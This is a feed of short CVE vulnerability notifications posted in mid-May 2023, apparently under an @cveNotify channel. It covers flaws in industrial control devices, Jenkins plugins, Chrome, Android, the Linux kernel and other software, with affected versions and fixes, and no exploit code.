🚨 CVE-2022-28613A vulnerability in the HCI Modbus TCP COMPONENT of Hitachi Energy RTU500 series CMU Firmware that is caused by the validation error in the length information carried in MBAP header allows an ATTACKER to reboot the device by sending a special crafted message. This issue affects: Hitachi Energy RTU500 series CMU Firmware 12.0.*; 12.2.*; 12.4.*; 12.6.*; 12.7.*; 13.2.*.🎖@cveNotify |
|
| 2023-05-16 23:58:35 |
🚨 CVE-2021-35533Improper Input Validation vulnerability in the APDU parser in the Bidirectional Communication Interface (BCI) IEC 60870-5-104 function of Hitachi Energy RTU500 series allows an attacker to cause the receiving RTU500 CMU of which the BCI is enabled to reboot when receiving a specially crafted message. By default, BCI IEC 60870-5-104 function is disabled (not configured). This issue affects: Hitachi Energy RTU500 series CMU Firmware version 12.0.* (all versions); CMU Firmware version 12.2.* (all versions); CMU Firmware version 12.4.* (all versions).🎖@cveNotify |
|
| 2023-05-16 23:58:33 |
🚨 CVE-2021-27196Improper Input Validation vulnerability in Hitachi ABB Power Grids Relion 670 Series, Relion 670/650 Series, Relion 670/650/SAM600-IO, Relion 650, REB500, RTU500 Series, FOX615 (TEGO1), MSM, GMS600, PWC600 allows an attacker with access to the IEC 61850 network with knowledge of how to reproduce the attack, as well as the IP addresses of the different IEC 61850 access points (of IEDs/products), to force the device to reboot, which renders the device inoperable for approximately 60 seconds. This vulnerability affects only products with IEC 61850 interfaces. This issue affects: Hitachi ABB Power Grids Relion 670 Series 1.1; 1.2.3 versions prior to 1.2.3.20; 2.0 versions prior to 2.0.0.13; 2.1; 2.2.2 versions prior to 2.2.2.3; 2.2.3 versions prior to 2.2.3.2. Hitachi ABB Power Grids Relion 670/650 Series 2.2.0 versions prior to 2.2.0.13. Hitachi ABB Power Grids Relion 670/650/SAM600-IO 2.2.1 versions prior to 2.2.1.6. Hitachi ABB Power Grids Relion 650 1.1; 1.2; 1.3 versions prior to 1.3.0.7. Hitachi ABB Power Grids REB500 7.3; 7.4; 7.5; 7.6; 8.2; 8.3. Hitachi ABB Power Grids RTU500 Series 7.x version 7.x and prior versions; 8.x version 8.x and prior versions; 9.x version 9.x and prior versions; 10.x version 10.x and prior versions; 11.x version 11.x and prior versions; 12.x version 12.x and prior versions. Hitachi ABB Power Grids FOX615 (TEGO1) R1D02 version R1D02 and prior versions. Hitachi ABB Power Grids MSM 2.1.0 versions prior to 2.1.0. Hitachi ABB Power Grids GMS600 1.3.0 version 1.3.0 and prior versions. Hitachi ABB Power Grids PWC600 1.0 versions prior to 1.0.1.4; 1.1 versions prior to 1.1.0.1.🎖@cveNotify |
|
| 2023-05-16 23:58:32 |
🚨 CVE-2018-1168This vulnerability allows local attackers to escalate privileges on vulnerable installations of ABB MicroSCADA 9.3 with FP 1-2-3. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the configuration of the access controls for the installed product files. The installation procedure leaves critical files open to manipulation by any authenticated user. An attacker can leverage this vulnerability to escalate privileges to SYSTEM. Was ZDI-CAN-5097.🎖@cveNotify |
|
| 2023-05-16 23:58:31 |
🚨 CVE-2021-31239An issue found in SQLite SQLite3 v.3.35.4 that allows a remote attacker to cause a denial of service via the appendvfs.c function.🎖@cveNotify |
|
| 2023-05-16 23:58:29 |
🚨 CVE-2018-20720ABB Relion 630 devices 1.1 before 1.1.0.C0, 1.2 before 1.2.0.B3, and 1.3 before 1.3.0.A6 allow remote attackers to cause a denial of service (reboot) via a reboot command in an SPA message.🎖@cveNotify |
|
| 2023-05-16 23:58:28 |
🚨 CVE-2019-18247An attacker may use a specially crafted message to force Relion 650 series (versions 1.3.0.5 and prior) or Relion 670 series (versions 1.2.3.18, 2.0.0.11, 2.1.0.1 and prior) to reboot, which could cause a denial of service.🎖@cveNotify |
|
| 2023-05-16 23:58:26 |
🚨 CVE-2019-18253An attacker could use specially crafted paths in a specific request to read or delete files from Relion 670 Series (versions 1p1r26, 1.2.3.17, 2.0.0.10, RES670 2.0.0.4, 2.1.0.1, and prior) outside the intended directory.🎖@cveNotify |
|
| 2023-05-16 23:58:25 |
🚨 CVE-2017-15583The embedded web server on ABB Fox515T 1.0 devices is vulnerable to Local File Inclusion. It accepts a parameter that specifies a file for display or for use as a template. The filename is not validated; an attacker could retrieve any file.🎖@cveNotify |
|
| 2023-05-16 23:58:23 |
🚨 CVE-2017-14025An Improper Input Validation issue was discovered in ABB FOX515T release 1.0. An improper input validation vulnerability has been identified, allowing a local attacker to provide a malicious parameter to the script that is not validated by the application, This could enable the attacker to retrieve any file on the server.🎖@cveNotify |
|
| 2023-05-16 23:58:22 |
🚨 CVE-2021-22278A certificate validation vulnerability in PCM600 Update Manager allows attacker to get unwanted software packages to be installed on computer which has PCM600 installed.🎖@cveNotify |
|
| 2023-05-16 23:58:21 |
🚨 CVE-2021-35526Backup file without encryption vulnerability is found in Hitachi ABB Power Grids System Data Manager – SDM600 allows attacker to gain access to sensitive information. This issue affects: Hitachi ABB Power Grids System Data Manager – SDM600 1.2 versions prior to FP2 HF6 (Build Nr. 1.2.14002.257).🎖@cveNotify |
|
| 2023-05-16 23:58:19 |
🚨 CVE-2023-25824Mod_gnutls is a TLS module for Apache HTTPD based on GnuTLS. Versions from 0.9.0 to 0.12.0 (including) did not properly fail blocking read operations on TLS connections when the transport hit timeouts. Instead it entered an endless loop retrying the read operation, consuming CPU resources. This could be exploited for denial of service attacks. If trace level logging was enabled, it would also produce an excessive amount of log output during the loop, consuming disk space. The problem has been fixed in commit d7eec4e598158ab6a98bf505354e84352f9715ec, please update to version 0.12.1. There are no workarounds, users who cannot update should apply the errno fix detailed in the security advisory.🎖@cveNotify |
|
| 2023-05-16 23:58:18 |
🚨 CVE-2023-32570VideoLAN dav1d before 1.2.0 has a thread_task.c race condition that can lead to an application crash, related to dav1d_decode_frame_exit.🎖@cveNotify |
|
| 2023-05-16 23:58:17 |
🚨 CVE-2019-5620ABB MicroSCADA Pro SYS600 version 9.3 suffers from an instance of CWE-306: Missing Authentication for Critical Function.🎖@cveNotify |
|
| 2023-05-16 23:58:15 |
🚨 CVE-2023-27527Shinseiyo Sogo Soft (7.9A) and earlier improperly restricts XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the PC may be accessed by an attacker.🎖@cveNotify |
|
| 2023-05-16 23:58:14 |
🚨 CVE-2021-35527Password autocomplete vulnerability in the web application password field of Hitachi ABB Power Grids eSOMS allows attacker to gain access to user credentials that are stored by the browser. This issue affects: Hitachi ABB Power Grids eSOMS version 6.3 and prior versions.🎖@cveNotify |
|
| 2023-05-16 20:58:30 |
🚨 CVE-2023-31474An issue was discovered on GL.iNet devices before 3.216. Through the software installation feature, it is possible to inject arbitrary parameters in a request to cause opkg to obtain a list of files in a specific directory, by using the regex feature in a package name.🎖@cveNotify |
|
| 2023-05-16 20:58:29 |
🚨 CVE-2023-2721Use after free in Navigation in Google Chrome prior to 113.0.5672.126 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical)🎖@cveNotify |
|
| 2023-05-16 20:58:28 |
🚨 CVE-2023-2723Use after free in DevTools in Google Chrome prior to 113.0.5672.126 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-05-16 20:58:24 |
🚨 CVE-2023-2726Inappropriate implementation in WebApp Installs in Google Chrome prior to 113.0.5672.126 allowed an attacker who convinced a user to install a malicious web app to bypass install dialog via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-05-16 20:58:23 |
🚨 CVE-2023-30502Vulnerabilities exist in the Aruba EdgeConnect Enterprise command line interface that allow remote authenticated users to run arbitrary commands on the underlying host. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary commands as root on the underlying operating system leading to complete system compromise.🎖@cveNotify |
|
| 2023-05-16 20:58:19 |
🚨 CVE-2023-30504Vulnerabilities exist in the Aruba EdgeConnect Enterprise command line interface that allow remote authenticated users to run arbitrary commands on the underlying host. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary commands as root on the underlying operating system leading to complete system compromise.🎖@cveNotify |
|
| 2023-05-16 20:58:18 |
🚨 CVE-2023-30507Multiple authenticated path traversal vulnerabilities exist in the Aruba EdgeConnect Enterprise command line interface. Successful exploitation of these vulnerabilities result in the ability to read arbitrary files on the underlying operating system, including sensitive system files.🎖@cveNotify |
|
| 2023-05-16 20:58:14 |
🚨 CVE-2023-30509Multiple authenticated path traversal vulnerabilities exist in the Aruba EdgeConnect Enterprise command line interface. Successful exploitation of these vulnerabilities result in the ability to read arbitrary files on the underlying operating system, including sensitive system files.🎖@cveNotify |
|
| 2023-05-16 20:58:13 |
🚨 CVE-2023-2631A missing permission check in Jenkins Code Dx Plugin 3.1.0 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL.🎖@cveNotify |
|
| 2023-05-16 20:58:12 |
🚨 CVE-2023-32999A missing permission check in Jenkins AppSpider Plugin 1.0.15 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL and send an HTTP POST request with a JSON payload consisting of attacker-specified credentials.🎖@cveNotify |
|
| 2023-05-16 18:58:40 |
🚨 CVE-2023-32992Missing permission checks in Jenkins SAML Single Sign On(SSO) Plugin 2.0.2 and earlier allow attackers with Overall/Read permission to send an HTTP request to an attacker-specified URL and parse the response as XML, or parse a local file on the Jenkins controller as XML.🎖@cveNotify |
|
| 2023-05-16 18:58:38 |
🚨 CVE-2023-32993Jenkins SAML Single Sign On(SSO) Plugin 2.0.2 and earlier does not perform hostname validation when connecting to miniOrange or the configured IdP to retrieve SAML metadata, which could be abused using a man-in-the-middle attack to intercept these connections.🎖@cveNotify |
|
| 2023-05-16 18:58:37 |
🚨 CVE-2023-32994Jenkins SAML Single Sign On(SSO) Plugin 2.1.0 and earlier unconditionally disables SSL/TLS certificate validation for connections to miniOrange or the configured IdP to retrieve SAML metadata, which could be abused using a man-in-the-middle attack to intercept these connections.🎖@cveNotify |
|
| 2023-05-16 18:58:36 |
🚨 CVE-2023-32995A cross-site request forgery (CSRF) vulnerability in Jenkins SAML Single Sign On(SSO) Plugin 2.0.0 and earlier allows attackers to send an HTTP POST request with JSON body containing attacker-specified content, to miniOrange's API for sending emails.🎖@cveNotify |
|
| 2023-05-16 18:58:34 |
🚨 CVE-2023-32996A missing permission check in Jenkins SAML Single Sign On(SSO) Plugin 2.0.0 and earlier allows attackers with Overall/Read permission to send an HTTP POST request with JSON body containing attacker-specified content, to miniOrange's API for sending emails.🎖@cveNotify |
|
| 2023-05-16 18:58:33 |
🚨 CVE-2023-32997Jenkins CAS Plugin 1.6.2 and earlier does not invalidate the previous session on login.🎖@cveNotify |
|
| 2023-05-16 18:58:32 |
🚨 CVE-2023-32998A cross-site request forgery (CSRF) vulnerability in Jenkins AppSpider Plugin 1.0.15 and earlier allows attackers to connect to an attacker-specified URL and send an HTTP POST request with a JSON payload consisting of attacker-specified credentials.🎖@cveNotify |
|
| 2023-05-16 18:58:31 |
🚨 CVE-2023-32999A missing permission check in Jenkins AppSpider Plugin 1.0.15 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified username and password.🎖@cveNotify |
|
| 2023-05-16 18:58:29 |
🚨 CVE-2023-33000Jenkins NS-ND Integration Performance Publisher Plugin 4.8.0.149 and earlier does not mask credentials displayed on the configuration form, increasing the potential for attackers to observe and capture them.🎖@cveNotify |
|
| 2023-05-16 18:58:27 |
🚨 CVE-2023-33001Jenkins HashiCorp Vault Plugin 360.v0a_1c04cf807d and earlier does not properly mask (i.e., replace with asterisks) credentials in the build log when push mode for durable task logging is enabled.🎖@cveNotify |
|
| 2023-05-16 18:58:26 |
🚨 CVE-2023-33002Jenkins TestComplete support Plugin 2.8.1 and earlier does not escape the TestComplete project name, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.🎖@cveNotify |
|
| 2023-05-16 18:58:25 |
🚨 CVE-2023-33003A cross-site request forgery (CSRF) vulnerability in Jenkins Tag Profiler Plugin 0.2 and earlier allows attackers to reset profiler statistics.🎖@cveNotify |
|
| 2023-05-16 18:58:22 |
🚨 CVE-2023-33004A missing permission check in Jenkins Tag Profiler Plugin 0.2 and earlier allows attackers with Overall/Read permission to reset profiler statistics.🎖@cveNotify |
|
| 2023-05-16 18:58:21 |
🚨 CVE-2023-33005Jenkins WSO2 Oauth Plugin 1.0 and earlier does not invalidate the previous session on login.🎖@cveNotify |
|
| 2023-05-16 18:58:20 |
🚨 CVE-2023-33006A cross-site request forgery (CSRF) vulnerability in Jenkins WSO2 Oauth Plugin 1.0 and earlier allows attackers to trick users into logging in to the attacker's account.🎖@cveNotify |
|
| 2023-05-16 18:58:19 |
🚨 CVE-2023-33007Jenkins LoadComplete support Plugin 1.0 and earlier does not escape the LoadComplete test name, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.🎖@cveNotify |
|
| 2023-05-16 18:58:18 |
🚨 CVE-2023-32977Jenkins Pipeline: Job Plugin does not escape the display name of the build that caused an earlier build to be aborted, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to set build display names immediately.🎖@cveNotify |
|
| 2023-05-16 18:58:16 |
🚨 CVE-2023-32980A cross-site request forgery (CSRF) vulnerability in Jenkins Email Extension Plugin allows attackers to make another user stop watching an attacker-specified job.🎖@cveNotify |
|
| 2023-05-16 18:58:15 |
🚨 CVE-2023-30086Buffer Overflow vulnerability found in Libtiff V.4.0.7 allows a local attacker to cause a denial of service via the tiffcp function in tiffcp.c.🎖@cveNotify |
|
| 2023-05-16 18:58:14 |
🚨 CVE-2023-30087Buffer Overflow vulnerability found in Cesanta MJS v.1.26 allows a local attacker to cause a denial of service via the mjs_mk_string function in mjs.c.🎖@cveNotify |
|
| 2023-05-16 16:58:24 |
🚨 CVE-2023-31572An issue in Bludit 4.0.0-rc-2 allows authenticated attackers to change the Administrator password and escalate privileges via a crafted request.🎖@cveNotify |
|
| 2023-05-16 16:58:23 |
🚨 CVE-2023-30608sqlparse is a non-validating SQL parser module for Python. In affected versions the SQL parser contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service). This issue was introduced by commit `e75e358`. The vulnerability may lead to Denial of Service (DoS). This issues has been fixed in sqlparse 0.4.4 by commit `c457abd5f`. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-05-16 14:58:19 |
🚨 CVE-2023-2730Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.3.3.🎖@cveNotify |
|
| 2023-05-16 14:58:17 |
🚨 CVE-2023-27928A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Ventura 13.3, macOS Big Sur 11.7.5, watchOS 9.4, tvOS 16.4, iOS 15.7.4 and iPadOS 15.7.4, iOS 16.4 and iPadOS 16.4. An app may be able to access information about a user’s contacts🎖@cveNotify |
|
| 2023-05-16 13:58:42 |
🚨 CVE-2018-3866An exploitable buffer overflow vulnerability exists in the samsungWifiScan handler of video-core's HTTP server of Samsung SmartThings Hub STH-ETH-250 - Firmware version 0.20.17. The video-core process incorrectly extracts fields from a user-controlled JSON payload, leading to a buffer overflow on the stack. The strcpy at [8] overflows the destination buffer, which has a size of 40 bytes. An attacker can send an arbitrarily long 'callbackUrl' value in order to exploit this vulnerability.🎖@cveNotify |
|
| 2023-05-16 13:58:41 |
🚨 CVE-2017-7548PostgreSQL versions before 9.4.13, 9.5.8 and 9.6.4 are vulnerable to authorization flaw allowing remote authenticated attackers with no privileges on a large object to overwrite the entire contents of the object, resulting in a denial of service.🎖@cveNotify |
|
| 2023-05-16 13:58:40 |
🚨 CVE-2018-3903On Samsung SmartThings Hub STH-ETH-250 devices with firmware version 0.20.17, the video-core process incorrectly extracts fields from a user-controlled JSON payload, leading to a buffer overflow on the stack. An attacker can send an HTTP request to trigger this vulnerability. The memcpy call overflows the destination buffer, which has a size of 512 bytes. An attacker can send an arbitrarily long "url" value in order to overwrite the saved-PC with 0x42424242.🎖@cveNotify |
|
| 2023-05-16 13:58:36 |
🚨 CVE-2001-0897Cross-site scripting vulnerability in Infopop Ultimate Bulletin Board (UBB) before 5.47e allows remote attackers to steal user cookies via an [IMG] tag that references an about: URL with an onerror field.🎖@cveNotify |
|
| 2023-05-16 13:58:35 |
🚨 CVE-2022-44640Heimdal before 7.7.1 allows remote attackers to execute arbitrary code because of an invalid free in the ASN.1 codec used by the Key Distribution Center (KDC).🎖@cveNotify |
|
| 2023-05-16 13:58:31 |
🚨 CVE-2022-47943An issue was discovered in ksmbd in the Linux kernel 5.15 through 5.19 before 5.19.2. There is an out-of-bounds read and OOPS for SMB2_WRITE, when there is a large length in the zero DataOffset case.🎖@cveNotify |
|
| 2023-05-16 13:58:30 |
🚨 CVE-2022-47941An issue was discovered in ksmbd in the Linux kernel 5.15 through 5.19 before 5.19.2. fs/ksmbd/smb2pdu.c omits a kfree call in certain smb2_handle_negotiate error conditions, aka a memory leak.🎖@cveNotify |
|
| 2023-05-16 13:58:29 |
🚨 CVE-2021-33621The cgi gem before 0.1.0.2, 0.2.x before 0.2.2, and 0.3.x before 0.3.5 for Ruby allows HTTP response splitting. This is relevant to applications that use untrusted user input either to generate an HTTP response or to create a CGI::Cookie object.🎖@cveNotify |
|
| 2023-05-16 13:58:25 |
🚨 CVE-2022-2795By flooding the target resolver with queries exploiting this flaw an attacker can significantly impair the resolver's performance, effectively denying legitimate clients access to the DNS resolution service.🎖@cveNotify |
|
| 2023-05-16 13:58:24 |
🚨 CVE-2022-36946nfqnl_mangle in net/netfilter/nfnetlink_queue.c in the Linux kernel through 5.18.14 allows remote attackers to cause a denial of service (panic) because, in the case of an nf_queue verdict with a one-byte nfta_payload attribute, an skb_pull can encounter a negative skb->len.🎖@cveNotify |
|
| 2023-05-16 13:58:23 |
🚨 CVE-2022-34918An issue was discovered in the Linux kernel through 5.18.9. A type confusion bug in nft_set_elem_init (leading to a buffer overflow) could be used by a local attacker to escalate privileges, a different vulnerability than CVE-2022-32250. (The attacker can obtain root access, but must start with an unprivileged user namespace to obtain CAP_NET_ADMIN access.) This can be fixed in nft_setelem_parse_data in net/netfilter/nf_tables_api.c.🎖@cveNotify |
|
| 2023-05-16 05:58:21 |
🚨 CVE-2023-2710The video carousel slider with lightbox plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the search_term parameter in versions up to, and including, 1.0.22 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-05-16 05:58:20 |
🚨 CVE-2023-31047In Django 3.2 before 3.2.19, 4.x before 4.1.9, and 4.2 before 4.2.1, it was possible to bypass validation when using one form field to upload multiple files. This multiple upload has never been supported by forms.FileField or forms.ImageField (only the last uploaded file was validated). However, Django's "Uploading multiple files" documentation suggested otherwise.🎖@cveNotify |
|
| 2023-05-16 05:58:16 |
🚨 CVE-2023-0664A flaw was found in the QEMU Guest Agent service for Windows. A local unprivileged user may be able to manipulate the QEMU Guest Agent's Windows installer via repair custom actions to elevate their privileges on the system.🎖@cveNotify |
|
| 2023-05-16 05:58:15 |
🚨 CVE-2020-14422Lib/ipaddress.py in Python through 3.8.3 improperly computes hash values in the IPv4Interface and IPv6Interface classes, which might allow a remote attacker to cause a denial of service if an application is affected by the performance of a dictionary containing IPv4Interface or IPv6Interface objects, and this attacker can cause many dictionary entries to be created. This is fixed in: v3.5.10, v3.5.10rc1; v3.6.12; v3.7.9; v3.8.4, v3.8.4rc1, v3.8.5, v3.8.6, v3.8.6rc1; v3.9.0, v3.9.0b4, v3.9.0b5, v3.9.0rc1, v3.9.0rc2.🎖@cveNotify |
|
| 2023-05-16 05:58:14 |
🚨 CVE-2023-29961D-Link DIR-605L firmware version 1.17B01 BETA is vulnerable to stack overflow via /goform/formTcpipSetup,🎖@cveNotify |
|
| 2023-05-16 05:58:13 |
🚨 CVE-2023-26081In Epiphany (aka GNOME Web) through 43.0, untrusted web content can trick users into exfiltrating passwords, because autofill occurs in sandboxed contexts.🎖@cveNotify |
|
| 2023-05-16 01:58:29 |
🚨 CVE-2023-20726In mnld, there is a possible leak of GPS location due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07735968 / ALPS07884552 (For MT6880, MT6890, MT6980, MT6980D and MT6990 only); Issue ID: ALPS07735968 / ALPS07884552 (For MT6880, MT6890, MT6980, MT6980D and MT6990 only).🎖@cveNotify |
|
| 2023-05-16 01:58:28 |
🚨 CVE-2023-20930In pushDynamicShortcut of ShortcutPackage.java, there is a possible way to get the device into a boot loop due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-250576066🎖@cveNotify |
|
| 2023-05-16 01:58:27 |
🚨 CVE-2023-21102In __efi_rt_asm_wrapper of efi-rt-wrapper.S, there is a possible bypass of shadow stack protection due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-260821414References: Upstream kernel🎖@cveNotify |
|
| 2023-05-16 01:58:24 |
🚨 CVE-2023-21103In registerPhoneAccount of PhoneAccountRegistrar.java, uncaught exceptions in parsing persisted user data could lead to local persistent denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-259064622🎖@cveNotify |
|
| 2023-05-16 01:58:23 |
🚨 CVE-2023-21107In retrieveAppEntry of NotificationAccessDetails.java, there is a missing permission check. This could lead to local escalation of privilege across user boundaries with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-259385017🎖@cveNotify |
|
| 2023-05-16 01:58:22 |
🚨 CVE-2023-21109In multiple places of AccessibilityService, there is a possible way to hide the app from the user due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-261589597🎖@cveNotify |
|
| 2023-05-16 01:58:18 |
🚨 CVE-2023-21112In AnalyzeMfcResp of NxpMfcReader.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-252763983🎖@cveNotify |
|
| 2023-05-16 01:58:17 |
🚨 CVE-2023-21117In registerReceiverWithFeature of ActivityManagerService.java, there is a possible way for isolated processes to register a broadcast receiver due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-263358101🎖@cveNotify |
|
| 2023-05-16 01:58:13 |
🚨 CVE-2023-21118In unflattenString8 of Sensor.cpp, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-269014004🎖@cveNotify |
|
| 2023-05-16 01:58:12 |
🚨 CVE-2023-31131Greenplum Database (GPDB) is an open source data warehouse based on PostgreSQL. In versions prior to 6.22.3 Greenplum Database used an unsafe methods to extract tar files within GPPKGs. greenplum-db is vulnerable to path traversal leading to arbitrary file writes. An attacker can use this vulnerability to overwrite data or system files potentially leading to crash or malfunction of the system. Any files which are accessible to the running process are at risk. All users are requested to upgrade to Greenplum Database version 6.23.2 or higher. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-05-16 01:58:11 |
🚨 CVE-2021-0877Product: AndroidVersions: Android SoCAndroid ID: A-273754094🎖@cveNotify |
|
| 2023-05-15 22:58:18 |
🚨 CVE-2023-32233In the Linux kernel through 6.3.1, a use-after-free in Netfilter nf_tables when processing batch requests can be abused to perform arbitrary read and write operations on kernel memory. Unprivileged local users can obtain root privileges. This occurs because anonymous sets are mishandled.🎖@cveNotify |
|
| 2023-05-15 22:58:17 |
🚨 CVE-2023-32313vm2 is a sandbox that can run untrusted code with Node's built-in modules. In versions 3.9.17 and lower of vm2 it was possible to get a read-write reference to the node `inspect` method and edit options for `console.log`. As a result a threat actor can edit options for the `console.log` command. This vulnerability was patched in the release of version `3.9.18` of `vm2`. Users are advised to upgrade. Users unable to upgrade may make the `inspect` method readonly with `vm.readonly(inspect)` after creating a vm.🎖@cveNotify |
|
| 2023-05-15 22:58:16 |
🚨 CVE-2023-32314vm2 is a sandbox that can run untrusted code with Node's built-in modules. A sandbox escape vulnerability exists in vm2 for versions up to and including 3.9.17. It abuses an unexpected creation of a host object based on the specification of `Proxy`. As a result a threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version `3.9.18` of `vm2`. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-05-15 20:58:33 |
🚨 CVE-2023-28290Microsoft Remote Desktop app for Windows Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-05-15 20:58:32 |
🚨 CVE-2023-29324Windows MSHTML Platform Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2023-05-15 20:58:31 |
🚨 CVE-2023-29333Microsoft Access Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-05-15 20:58:30 |
🚨 CVE-2023-29335Microsoft Word Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2023-05-15 20:58:26 |
🚨 CVE-2023-24940Windows Pragmatic General Multicast (PGM) Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-05-15 20:58:25 |
🚨 CVE-2023-24943Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-05-15 20:58:24 |
🚨 CVE-2023-24944Windows Bluetooth Driver Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-05-15 20:58:20 |
🚨 CVE-2022-37306OX App Suite before 7.10.6-rev30 allows XSS via an upsell trigger.🎖@cveNotify |
|
| 2023-05-15 20:58:19 |
🚨 CVE-2022-43697OX App Suite before 7.10.6-rev30 allows XSS via an activity tracking adapter defined by jslob.🎖@cveNotify |
|
| 2023-05-15 20:58:18 |
🚨 CVE-2023-24947Windows Bluetooth Driver Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-05-15 20:58:14 |
🚨 CVE-2022-43696OX App Suite before 7.10.6-rev20 allows XSS via upsell ads.🎖@cveNotify |
|
| 2023-05-15 20:58:13 |
🚨 CVE-2023-1682A vulnerability has been found in Xunrui CMS 4.61 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /dayrui/My/Config/Install.txt. The manipulation leads to direct request. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-224239.🎖@cveNotify |
|
| 2023-05-15 20:58:12 |
🚨 CVE-2023-1681A vulnerability, which was classified as problematic, was found in Xunrui CMS 4.61. Affected is an unknown function of the file /config/myfield/test.php. The manipulation leads to information disclosure. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-224238 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-05-15 18:58:38 |
🚨 CVE-2023-30743Due to improper neutralization of input in SAPUI5 - versions SAP_UI 750, SAP_UI 754, SAP_UI 755, SAP_UI 756, SAP_UI 757, UI_700 200, sap.m.FormattedText SAPUI5 control allows injection of untrusted CSS. This blocks user’s interaction with the application. Further, in the absence of URL validation by the application, the vulnerability could lead to the attacker reading or modifying user’s information through phishing attack.🎖@cveNotify |
|
| 2023-05-15 18:58:37 |
🚨 CVE-2023-31508A cross-site scripting (XSS) vulnerability in PrestaShop v1.7.7.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the message parameter in /contactform/contactform.php.🎖@cveNotify |
|
| 2023-05-15 18:58:35 |
🚨 CVE-2023-29027A cross site scripting vulnerability was discovered in Rockwell Automation's ArmorStart ST product that could potentially allow a malicious user with admin privileges and network access to view user data and modify the web interface. Additionally, a malicious user could potentially cause interruptions to the availability of the web page.🎖@cveNotify |
|
| 2023-05-15 18:58:34 |
🚨 CVE-2023-29028A cross site scripting vulnerability was discovered in Rockwell Automation's ArmorStart ST product that could potentially allow a malicious user with admin privileges and network access to view user data and modify the web interface. Additionally, a malicious user could potentially cause interruptions to the availability of the web page.🎖@cveNotify |
|
| 2023-05-15 18:58:33 |
🚨 CVE-2023-29029A cross site scripting vulnerability was discovered in Rockwell Automation's ArmorStart ST product that could potentially allow a malicious user with admin privileges and network access to view user data and modify the web interface. Additionally, a malicious user could potentially cause interruptions to the availability of the web page.🎖@cveNotify |
|
| 2023-05-15 18:58:31 |
🚨 CVE-2023-29030A cross site scripting vulnerability was discovered in Rockwell Automation's ArmorStart ST product that could potentially allow a malicious user to view and modify sensitive data or make the web page unavailable. User interaction, such as a phishing attack, is required for successful exploitation of this vulnerability.🎖@cveNotify |
|
| 2023-05-15 18:58:30 |
🚨 CVE-2023-29031A cross site scripting vulnerability was discovered in Rockwell Automation's ArmorStart ST product that could potentially allow a malicious user to view and modify sensitive data or make the web page unavailable. User interaction, such as a phishing attack, is required for successful exploitation of this vulnerability.🎖@cveNotify |
|
| 2023-05-15 18:58:29 |
🚨 CVE-2023-29023A cross site scripting vulnerability was discovered in Rockwell Automation's ArmorStart ST product that could potentially allow a malicious user to view and modify sensitive data or make the web page unavailable. User interaction, such as a phishing attack, is required for successful exploitation of this vulnerability.🎖@cveNotify |
|
| 2023-05-15 18:58:27 |
